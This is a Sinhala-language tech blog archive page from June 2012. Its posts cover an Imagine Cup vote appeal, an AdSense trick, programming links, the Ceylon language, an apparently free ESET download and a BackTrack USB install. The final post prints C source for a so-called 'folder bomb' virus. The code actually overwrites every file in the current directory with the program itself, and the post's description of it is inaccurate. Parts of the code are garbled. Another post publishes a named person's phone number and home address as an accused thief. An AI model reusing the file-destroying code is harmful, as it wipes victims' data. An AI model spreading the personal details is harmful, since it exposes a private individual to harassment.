Adlink

Monday, June 25, 2012

Vote For SL








කොහොමද යාලුවනේ මම අද කියන්න යන්නේ ඔයාලගෙන් උදව්වක් බලාපොරොතුවෙන් අප රටට කිර්තියක් ගෙන එන වැඩක් ගැන ඔයාලා ගොඩක් දෙනෙක් දන්නවා imagine cup 2012 තරගයේදි ලන්කාවෙන පලමු ස්තානයට පත් උනේ මොරටුව විශ්ව විදයාලයේ තොරතුරු තාක්ශන පිඨය කියලා.දැන් අපේ අයියලා රටවල් 60ක් එක්ක තරග කරලා දෙවන ස්තානයට පත්වෙලා ඉන්නවා .අපිට ඔයාලගේ votes ගොඩක් වැදගත් ලන්කාව පලමු ස්තානයට ලගා විමට ඔබගේ උපරිම සහය ලබා දෙන්න .ඔයාලට සැම විනාඩි 15 කට වරක් vote කරන්න පුලුවන් දන්න කියන හැමෝටම කියලා අපේ රට දිනවන්න දායක වෙන්න
vote කරන්න පහත ලින්ක් එක භාවිත කරන්න





PROJECT TITLE: B­A­C­K­ ­2­ ­E­A­R­T­H­ ­-­ ­T­H­E­ ­S­O­C­I­A­L­,­ ­L­O­C­A­L­ ­A­N­D­ ­M­O­B­I­L­E­ ­S­O­L­U­T­I­O­N
V­3­6­0

SRI LANKA

SOFTWARE DESIGN

MALINDESILVA
University of Moratuwa-Faculty of Information technology-Sri Lanka
RUKSHAN DANGALLA
University of Moratuwa-Faculty of Information technology-Sri Lanka
THURUPATHAN
Faculty of Information Technology, University of Moratuwa

SAJINIJ

Sunday, June 24, 2012

AdSense පැය 9න්




හායි කස්ටිය කොහොමද ගොඩක් අයට වැදගත් වන දෙයක් තමයි මම අරන් ආවේ ගොඩක් යාලුවෝ ADSense ගන්න ගොඩක් මහන්සි වෙනවා බ්ලොග් එකක් හදාගෙන මාස ගානක් ඉන්ගිසි ලිපි ලියමින් ගොඩක් කාලය ගතවන වැඩකකෙහෙමත් නැත්නම් top ලෙවෙල් domain එකක් ඕනි වෙනවා.මම දැකලා තියෙනවා ගොඩක් අය ඇඩ්සෙන්ස් account එකක් හදලා දෙනවට විශාල වශයෙන් මුදල් අය කරනවා සමහරු එක adsense account එකක් හදලා දෙන්න රුපියල් 1500 වැනි මුදලක් පවා අය කරනවා.මාත් ඇඩ් සෙන්ස් ගන්න කියලා ගොඩක් ක්‍රම කරලා බැලුවා නමුත් ගොඩක් සාර්තක උනේ නැ .මම කියලා දෙන මේ ක්‍රමයෙන් ඔයාලට පැය 9ක් වැනි කෙටි කාලයක් තුල ඔබගේම ඇඩ්සෙන්ස් account එකක් හදාගන්න පුලුවන්.මම රුපසටහන් මගින් පැහැදිලි කිරිම් කරලා තියෙනවා කැමති කෙනෙක්ට උත්සහ කරලා බැලුවට මගේ අමනාපයක් නැ ඕන් :P
මම විතරක් තනියම කන් නැතුව ඔයාලත් එක්ක බෙදා හදා ගත්තා කොමෙන්ටුවකින් හරි වචනයක් සදහන් කරලා යනවනම් ගොඩක් සතුටුයි නැවත ලිපියකින් හමුවෙනතුරු ජය ශ්‍රි !


















Wednesday, June 20, 2012

JDBC දන්නවද





ඉගෙන ගන්න කැමති අය කොහොමද ජාවා ඇප් එකක් හා database එකක් එකට connect කරන්නේ කියලා පහත ලින්ක් එක ක්ලික් කරලා බලන්න

Tuesday, June 19, 2012

Programming Cheat Sheet



හායි කොහොමද යාලුවනේ අද මම අපේ programming කරන යාලුවන්ට උදව්වක් විදිහට Cheat Sheet ටිකක් ගෙනාවා. ගිහින් හොදද බලන්න.exam කාලෙට එහෙම සුපිරි එහෙනම් අපි ගියා ජය ශ්‍රි !



Learn CSS




හායි කස්ටිය අද මම ඔයාලට CSS ගැන ඉගෙන ගන්න ebook එකක් ගෙනවා කැමති අය පහල තියෙන ලින්ක් එකෙන් ගිහින් බලන්න හොදයි කියලා හිතුනොත් download කරගන්න එහෙනම් ජය ශ්‍රි !


Sunday, June 17, 2012

මගේ ඇලට් පේ එකට රින්ගපු හරක් හොරා



මම අද දැක්කේ මම ගොඩ කාලෙකින් මගේ ඇලට් පේ එකට ගියෙ නැ මොකෙක්ද පොන්සි පැටියෙක් එකට transaction details change කරලා මගෙ ඒවා මකලා උගේ ඒවා දාලා මේ තියෙන්නේ එවා
 phone 0722669346 
address 594 
Gamogoda 
Galle
 තමුසෙ අලි හොරෙක් ලජ්ජ නැද්ද තමුසෙට

Saturday, June 16, 2012

Ceylon (programming language)



හායි කස්ටිය මාතෘකාව දැක්කම මොකක්ද කියලා එක පාරටම හිතාගන්න අමාරුයි නේද.දැන් අපේ රටේ නම තියෙන පරිගණක භාශාවකුත් නිකුත් වෙලා මේක 2011 ඉදන් තමා නිකුත් වෙලා තියෙන්නේ,රෙඩ් හැට් සමාගම විසින් නිපාදනය කරපු මෙම language එක design කරලා තියෙන්නේ Gavin King කියන මහත්මයෙක් මෙම සිලොන් පරිගනක භාශාවේ extention එක විදිහට .ceylon යන්න තමා යෙදෙන්නේ.(අපිටත් ආඩම්බරයි නේද අපේ රටට කලින් කියපු නමක් ටියෙන නිසා)තව විශ්ලේශයකයන් කියන අන්දමට මේක Red Hat builds Java killer replacementඑකක් විදිහට තමා හදුන් වන්නේ මේක JVM(java virtual machine )එක උඩ තමා run වෙන්නේම්ම් තව මේම පරිගණක භාශාව ගැන කියනවානම් මේක සදහා Java, Scala, Smalltalk යන පරිගනක භාශාවන්ගේ ආභාශය ලැබී තියෙනවා (Scala as a possible successor to java)
Ceylon වලදි  Hello World ලියන්නේ මෙහෙමයි

void hello() {
    print("Hello, World!");
}

 මේ ගැන වැඩි විස්තර දැන ගැනිමට පහත සදහන් ලින්ක්ස් භාවිතා කරන්න පුලුවන්


එහෙනම් තව ලිපියකින් හමු වෙන බලාපොරොත්තුවෙන් අපි ගියා
 ජය ශ්‍රි !


link 1


link 2




Friday, June 15, 2012

ESET Smart Security Free





කොහොමද යාලුවනේ අද මම කියලා දෙන්න යන්නේ කොහොමද Eset Smart Security මුදල් නොගෙවා ගන්නේ කියලා.ඔයාලා දන්නවා ගොඩක් virus guard තිබුනට සමහර ඒවට ගොඩක් virus අහු වෙන්නේ නැ වගේම සමහර virus guard නිසා ඔබගේ පරිගනකයේ වේගය බොහෝ සෙයින් අඩු විමට බලපානවා.නමුත් Eset භාවිතයේදි ඔබගේ පරිගනකයේ වේගය අඩු විම වෙනත් anti virus protection එක්ක සැසදිමේදි බොහෝ සෙයින් අඩුයි.මම මෙය ඔබට පැහැදිලි විම සදහා video එකක් නිර්මාණය කරා.ඔබට video එකේ සදහන් සොෆ්ට්වෙයා එක download කරගැනිමට ලින්ක් එක පහතින් සදහන් කරනම් ,එහනම් නැවත ලිපියකින් හමුවෙන බලාපොරොතුවෙන් අපි ගියා
 කස්ටියටම ජය ශ්‍රි !


Link 1






Thursday, June 14, 2012

How To Install Back Track Using Pen Drive




හායි කස්ටිය අද මම පොඩි video එකක් කරා කොහොමද pen drive එකක් භාවිතා කරලා Back Track 5 install කර ගන්නේ කියලා මේ සදහා අපිට පහත සදහන් software එක භාවිත කරන්න වෙනවා ,ඩවුන්ලෝඩ් ලින්ක් එක මම පහත සදහන් කරන්නමමෙහෙනම් බලන්නකෝ video එක හොදද කියලා එහෙනම් නැවත ලිපියකින් හමුවෙමු ජය ශ්‍රී !
http://ity.im/0rN07










Tuesday, June 12, 2012

Simple Virus Using C





හායි කස්ටිය ගොඩ දවසකින් ඔයාලට ටෙක්නිකල් සම්බන්ද පෝස්ට් එකක් දාන්නත් බැරි උනා අද කියල දෙන්න යන්නේ කොහොමද c programing language එක භාවිතා කරලා සරල විදිහේ virus එකක් හදන්නේ කියලා,educational purpose වලට විතරක් මේක පාවිචි කරන්න.ඔයාලට ඉදිරියේදි c programing language එක ගැන පාඩම් මාලාවක් ගේන්නත් බලාපොරොත්තු වෙනවා.ඔයාලට මෙහිදි C  source code එක compile කර ගැනිමට අවශය වෙනවා.මේ සදහා ලේසිම විදිහ ලෙස dev c++ හෝ code blocks ඔයාලට යොදා ගන්න පුලුවන්.
code blocks Download කර ගන්න මෙතනින්
 නැත්නම් 
 dev c++ download කර ගන්න


ඔයාලට කරන්න තියෙන්නෙ හරිම සිම්පල් දෙයක් මම දිලා තියෙන ලින්ක් වලින් ඔයා කැමති එකක් භාවිතා කරලා අපිට අවශය කරන කොඩ් එක compile කර ගැනිමට අවශය IDE එක download කරගන්න. code blocks එක 70mb වන අටර dev c++ 13.5 mb විතර වෙනවා.
ඔබ කැමති එකක් භාගත කරගෙන installe කරන්න හරිම ලේසි.ඉන් පසු file new -->ඔනි කරන කොඩ් එක පේස්ට් කරලා save as  ගිහින් කැමති නමක් එක්ක ෆයිල් ෆොමැට් එක ලෙස  C source file යන්න තෝරන්න.
මේ ටික කිවේ C ගැන දැනුමක් නැති අය සදහා .මෙහිදි exe එකක් හැදෙන අටර එය virus  එක ලෙස ක්‍රියා කරයි එක නිසා exe එක හැදුනට පස්සේ run කරන්න එපා මොකද මෙහිදි වෙන්නේ folder එකක් තුල නැවත නැවත folder සකස් විමයි.Educational purpose only dont missuse IT
source code:



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: FolderFllod\nProgrammer:MoulderFiles.blogspot.com\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}